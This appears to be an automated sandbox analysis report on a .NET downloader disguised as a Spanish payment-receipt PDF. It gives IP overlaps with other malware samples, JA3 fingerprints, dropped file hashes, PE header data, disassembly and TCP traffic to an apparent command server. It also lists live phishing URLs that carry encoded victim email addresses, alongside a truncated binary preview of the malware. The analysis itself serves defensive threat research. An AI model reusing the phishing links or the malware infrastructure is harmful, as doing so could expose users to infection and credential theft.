                                                                              SsQblB4e3Y.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                              • 109.236.63.122
                                                                              python.exeGet hashmaliciousCobaltStrikeBrowse
                                                                              • 45.15.161.97
                                                                              Vbdpz74ndQ.elfGet hashmaliciousMirai, MoobotBrowse
                                                                              • 45.152.35.120
                                                                              PO#_HTS-PO-0209.exeGet hashmaliciousGuLoaderBrowse
                                                                              • 193.25.214.212
                                                                              PO#_HTS-PO-0209.exeGet hashmaliciousGuLoaderBrowse
                                                                              • 193.25.214.212
                                                                              qrtzqUHSqT.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoaderBrowse
                                                                              • 109.236.63.122
                                                                              EDGECASTUShttps://pocloudcentral.crm.powerobjects.net/PowerEmailWebsite//GetUrl2013.aspx?t=TEka9Gzp+UWz6rVgaDAhSUMAUgBNAA==&eId=03e02621-4ddf-eb11-8150-00155d010e03&pval=//darmlinkt%E3%80%82com/#pIqwdGFpbHlubl9vbHZlcmFAZ2Vuc2xlci5jb20=??kypxg44fhlrkaixdobr=dGFpbHlubl9vbHZlcmFAZ2Vuc2xlci5jb20=/..=EAx0L6O&u=276b8dda4ef94158348d5b6b8&id=6b7205781dGet hashmaliciousHTMLPhisherBrowse
                                                                              • 152.195.19.97
                                                                              https://ir.shareaholic.com/e?a=1&u=https://sso.college/laurQ3En-d54RAngQ3EgnQ3Er4RAl-Q8Kvorza-d58Kvo-y5%3Futm_campaign%3Dshareaholic%26utm_medium%3Dtwitter%26utm_source%3Dsocialnetwork&r=1Get hashmaliciousHTMLPhisherBrowse
                                                                              • 152.199.4.44
                                                                              SecuriteInfo.com.Win32.TrojanX-gen.13022.123.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                              • 192.229.211.108
                                                                              SecuriteInfo.com.Win32.TrojanX-gen.27824.18326.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                              • 152.199.5.152
                                                                              SecuriteInfo.com.Win32.TrojanX-gen.11858.8806.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                              • 152.199.5.152
                                                                              https://cloudflare-ipfs.com/ipfs/bafkreicxkrcq2o3ehatnqhjxr6jcymd4zbajdmvgo2ssqyhiaigonqwbxm#kdobbins@drinkbodyarmor.comGet hashmaliciousHTMLPhisherBrowse
                                                                              • 152.195.19.97
                                                                              https://www.joesandbox.com/#windowsGet hashmaliciousUnknownBrowse
                                                                              • 152.199.5.152
                                                                              https://pocloudcentral.crm.powerobjects.net/PowerEmailWebsite//GetUrl2013.aspx?t=TEka9Gzp+UWz6rVgaDAhSUMAUgBNAA==&eId=03e02621-4ddf-eb11-8150-00155d010e03&pval=//companytst%E3%80%82com/#nuhFZ2FycmV0dC5ib2F0bWFuQHJhdmVpcy5jb20=??kypxg44fhlrkaixdobr=Z2FycmV0dC5ib2F0bWFuQHJhdmVpcy5jb20=/..=J3I8Or&u=276b8dda4ef94158348d5b6b8&id=6b7205781dGet hashmaliciousHTMLPhisherBrowse
                                                                              • 152.195.19.97
                                                                              SecuriteInfo.com.Win32.TrojanX-gen.12059.13339.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                              • 152.195.19.97
                                                                              https://ir.shareaholic.com/e?a=1&u=https://sso.college/rm3Trojanl-Qholland8Kvo-d58Kvo-y5%3Futm_campaign%3Dshareaholic%26utm_medium%3Dtwitter%26utm_source%3Dsocialnetwork&r=1Get hashmaliciousHTMLPhisherBrowse
                                                                              • 152.199.4.44
                                                                              LocawebServicosdeInternetSABRInvoice and delivery order.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                              • 191.252.141.106
                                                                              8holJWXFZe.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoader, StealcBrowse
                                                                              • 200.234.204.130
                                                                              P000022633.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                              • 191.252.141.106
                                                                              New Order________xls.xlsmGet hashmaliciousUnknownBrowse
                                                                              • 191.252.141.106
                                                                              New Order________xls.xlsmGet hashmaliciousUnknownBrowse
                                                                              • 191.252.141.106
                                                                              Order Previews_____________pdf.exeGet hashmaliciousUnknownBrowse
                                                                              • 191.252.141.106
                                                                              Order Previews_____________pdf.exeGet hashmaliciousUnknownBrowse
                                                                              • 191.252.141.106
                                                                              Orden de compra____________pdf.exeGet hashmaliciousUnknownBrowse
                                                                              • 191.252.141.106
                                                                              Orden de compra____________pdf.exeGet hashmaliciousUnknownBrowse
                                                                              • 191.252.141.106
                                                                              Documento de despacho__xls.exeGet hashmaliciousUnknownBrowse
                                                                              • 191.252.141.106

                                                                              JA3 Fingerprints

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              3b5074b1b5d032e5620f69f9f700ff0eFrankdocument.pdf.lnkGet hashmaliciousGuLoaderBrowse
                                                                              • 45.83.31.187
                                                                              SecuriteInfo.com.Win32.TrojanX-gen.11858.8806.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                              • 45.83.31.187
                                                                              SecuriteInfo.com.Win32.PWSX-gen.10081.22034.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                              • 45.83.31.187
                                                                              155320-535432-534542.zipGet hashmaliciousUnknownBrowse
                                                                              • 45.83.31.187
                                                                              BL-SHIPPING INVOICE.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                              • 45.83.31.187
                                                                              jO0tVWkVaK8UcUQmax.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                              • 45.83.31.187
                                                                              dwIu74hsC1.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                              • 45.83.31.187
                                                                              PN MT9162AN1.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                              • 45.83.31.187
                                                                              Overdue Invoice.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                              • 45.83.31.187
                                                                              output.ps1Get hashmaliciousXWormBrowse
                                                                              • 45.83.31.187

                                                                              Dropped Files

                                                                              No context

                                                                              Created / dropped Files

                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\JUSTIFICANTE DE PAGO CF.pdf.exe.log

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1342
                                                                              Entropy (8bit):5.356174099965624
                                                                              Encrypted:false
                                                                              SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzetfE4KhBE4KAE4KoE4Tye:MxHKlYHKh3oPtHo6hAHKzetfHKhBHKAX
                                                                              MD5:EC938B1E473862E00335136BF3BC55FE
                                                                              SHA1:EFD3018BF8CFB1E2AA47B4D8F8CC2A848A351B88
                                                                              SHA-256:323C1952255A753990FB610C303F4AF29CE622AECB64976A8F233FDEDFD5F537
                                                                              SHA-512:DC2D435FCEB877DB72F44BBBF7F3E825DB0E644E8B0C7D5779B857D3DEF1D71FF424B7D9731A4B3486144C26EB7DD78B54EA53C31031083B19FFF50989F4BC46
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.IdentityModel, Version=4.0.0.0, Culture=neutral,

                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Reramvw.exe.log

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\Reramvw.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1342
                                                                              Entropy (8bit):5.356174099965624
                                                                              Encrypted:false
                                                                              SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzetfE4KhBE4KAE4KoE4Tye:MxHKlYHKh3oPtHo6hAHKzetfHKhBHKAX
                                                                              MD5:EC938B1E473862E00335136BF3BC55FE
                                                                              SHA1:EFD3018BF8CFB1E2AA47B4D8F8CC2A848A351B88
                                                                              SHA-256:323C1952255A753990FB610C303F4AF29CE622AECB64976A8F233FDEDFD5F537
                                                                              SHA-512:DC2D435FCEB877DB72F44BBBF7F3E825DB0E644E8B0C7D5779B857D3DEF1D71FF424B7D9731A4B3486144C26EB7DD78B54EA53C31031083B19FFF50989F4BC46
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.IdentityModel, Version=4.0.0.0, Culture=neutral,

                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\repeat.exe.log

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\repeat\repeat.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1342
                                                                              Entropy (8bit):5.356174099965624
                                                                              Encrypted:false
                                                                              SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzetfE4KhBE4KAE4KoE4Tye:MxHKlYHKh3oPtHo6hAHKzetfHKhBHKAX
                                                                              MD5:EC938B1E473862E00335136BF3BC55FE
                                                                              SHA1:EFD3018BF8CFB1E2AA47B4D8F8CC2A848A351B88
                                                                              SHA-256:323C1952255A753990FB610C303F4AF29CE622AECB64976A8F233FDEDFD5F537
                                                                              SHA-512:DC2D435FCEB877DB72F44BBBF7F3E825DB0E644E8B0C7D5779B857D3DEF1D71FF424B7D9731A4B3486144C26EB7DD78B54EA53C31031083B19FFF50989F4BC46
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.IdentityModel, Version=4.0.0.0, Culture=neutral,

                                                                              C:\Users\user\AppData\Roaming\Reramvw.exe

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):32256
                                                                              Entropy (8bit):5.568919273942432
                                                                              Encrypted:false
                                                                              SSDEEP:768:P0WhyGSUtsihJU1D81S4CBfwYzUppZ9/5W/jlaS:PbEF+sihJCD8Q9UppZ9/5W/jlaS
                                                                              MD5:5D9F0CA0E2B0E41F30A1CCE0B002484B
                                                                              SHA1:1EB77E3633DCFBFD2163A8E9A0C0A3F2588C0B14
                                                                              SHA-256:344BB8AE2D9AFBF9F666A844F6E9A7606EAA226A0383B84CF173F0F3725FABFF
                                                                              SHA-512:D78B1A5A55D16EB73E8D9D7CA2AE7925BAE7BC1F829C727B99DCF2E0725EECD831403AD8798572222B1D4963F9ABEAB1B0B8FFA3DC37C4636838254957388434
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Reramvw.exe, Author: Joe Security
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 34%
                                                                              Reputation:low
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....&.e.................t............... ........@.. ....................................`.....................................K.......`............................................................................ ............... ..H............text...4s... ...t.................. ..`.rsrc...`............v..............@..@.reloc...............|..............@..B........................H.......X^..|4...........................................................*...(....*..0..d....... ........8........E........M...q...8...4...........L...M.......x...z...8..... ....8....8.... ....~X...{-...:....& ....8......o....(...+.. ....8....*8.... ....~X...{....9e...& ....8Z....r...p(....t....o....t....o....s....o....& ....~X...{G...:....& ....8........E........8.....c...& ....~X...{P...:....& ....8........E........8.....,... ....8......:4... ....~X...{....9....& ....8.....

                                                                              C:\Users\user\AppData\Roaming\Reramvw.exe:Zone.Identifier

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):26
                                                                              Entropy (8bit):3.95006375643621
                                                                              Encrypted:false
                                                                              SSDEEP:3:ggPYV:rPYV
                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                              Malicious:false
                                                                              Reputation:high, very likely benign file
                                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                                              C:\Users\user\AppData\Roaming\repeat\repeat.exe

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):32256
                                                                              Entropy (8bit):5.568919273942432
                                                                              Encrypted:false
                                                                              SSDEEP:768:P0WhyGSUtsihJU1D81S4CBfwYzUppZ9/5W/jlaS:PbEF+sihJCD8Q9UppZ9/5W/jlaS
                                                                              MD5:5D9F0CA0E2B0E41F30A1CCE0B002484B
                                                                              SHA1:1EB77E3633DCFBFD2163A8E9A0C0A3F2588C0B14
                                                                              SHA-256:344BB8AE2D9AFBF9F666A844F6E9A7606EAA226A0383B84CF173F0F3725FABFF
                                                                              SHA-512:D78B1A5A55D16EB73E8D9D7CA2AE7925BAE7BC1F829C727B99DCF2E0725EECD831403AD8798572222B1D4963F9ABEAB1B0B8FFA3DC37C4636838254957388434
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe, Author: Joe Security
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 34%
                                                                              Reputation:low
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....&.e.................t............... ........@.. ....................................`.....................................K.......`............................................................................ ............... ..H............text...4s... ...t.................. ..`.rsrc...`............v..............@..@.reloc...............|..............@..B........................H.......X^..|4...........................................................*...(....*..0..d....... ........8........E........M...q...8...4...........L...M.......x...z...8..... ....8....8.... ....~X...{-...:....& ....8......o....(...+.. ....8....*8.... ....~X...{....9e...& ....8Z....r...p(....t....o....t....o....s....o....& ....~X...{G...:....& ....8........E........8.....c...& ....~X...{P...:....& ....8........E........8.....,... ....8......:4... ....~X...{....9....& ....8.....

                                                                              C:\Users\user\AppData\Roaming\repeat\repeat.exe:Zone.Identifier

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):26
                                                                              Entropy (8bit):3.95006375643621
                                                                              Encrypted:false
                                                                              SSDEEP:3:ggPYV:rPYV
                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                              Malicious:true
                                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Entropy (8bit):5.568919273942432
                                                                              TrID:
                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                              File name:JUSTIFICANTE DE PAGO CF.pdf.exe
                                                                              File size:32'256 bytes
                                                                              MD5:5d9f0ca0e2b0e41f30a1cce0b002484b
                                                                              SHA1:1eb77e3633dcfbfd2163a8e9a0c0a3f2588c0b14
                                                                              SHA256:344bb8ae2d9afbf9f666a844f6e9a7606eaa226a0383b84cf173f0f3725fabff
                                                                              SHA512:d78b1a5a55d16eb73e8d9d7ca2ae7925bae7bc1f829c727b99dcf2e0725eecd831403ad8798572222b1d4963f9abeab1b0b8ffa3dc37c4636838254957388434
                                                                              SSDEEP:768:P0WhyGSUtsihJU1D81S4CBfwYzUppZ9/5W/jlaS:PbEF+sihJCD8Q9UppZ9/5W/jlaS
                                                                              TLSH:05E2180BB79A87A1D699873FC5E391400336D79BFB23D61E748AA34549037D8CA71783
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....&.e.................t............... ........@.. ....................................`................................

                                                                              File Icon

                                                                              Icon Hash:00928e8e8686b000

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x40932e
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x65D6260F [Wed Feb 21 16:34:23 2024 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              jmp dword ptr [00402000h]
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al

                                                                              Data Directories

                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x92e00x4b.text
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xa0000x560.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xc0000xc.reloc
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                              Sections

                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x20000x73340x7400fc5e6dd55c43dc18c48d401ca2a0bcc4False0.5141769935344828data5.70817919516591IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rsrc0xa0000x5600x600c81d07d7c69b56629a05b8a5ccf50574False0.3990885416666667data3.9260486062024667IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .reloc0xc0000xc0x200264f7c08371f1dde021d1643e85ab5cfFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                              Resources

                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              RT_VERSION0xa0a00x2d4data0.43232044198895025
                                                                              RT_MANIFEST0xa3740x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                              Imports

                                                                              DLLImport
                                                                              mscoree.dll_CorExeMain

                                                                              Network Behavior

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Feb 21, 2024 21:08:48.098082066 CET4970580192.168.2.593.184.216.34
                                                                              Feb 21, 2024 21:08:48.185408115 CET804970593.184.216.34192.168.2.5
                                                                              Feb 21, 2024 21:08:48.185506105 CET4970580192.168.2.593.184.216.34
                                                                              Feb 21, 2024 21:08:48.185903072 CET4970580192.168.2.593.184.216.34
                                                                              Feb 21, 2024 21:08:48.273277044 CET804970593.184.216.34192.168.2.5
                                                                              Feb 21, 2024 21:08:48.273284912 CET804970593.184.216.34192.168.2.5
                                                                              Feb 21, 2024 21:08:48.273722887 CET4970580192.168.2.593.184.216.34
                                                                              Feb 21, 2024 21:08:48.401627064 CET804970593.184.216.34192.168.2.5
                                                                              Feb 21, 2024 21:08:48.425983906 CET804970593.184.216.34192.168.2.5
                                                                              Feb 21, 2024 21:08:48.480902910 CET4970580192.168.2.593.184.216.34
                                                                              Feb 21, 2024 21:08:48.647247076 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:48.647289991 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:48.647368908 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:48.660305977 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:48.660326958 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:48.943742990 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:48.943975925 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:48.947074890 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:48.947088957 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:48.947529078 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:48.996527910 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.131567001 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.173964977 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.380888939 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.380925894 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.380960941 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.381047010 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.381074905 CET4434970645.83.31.187192.168.2.5
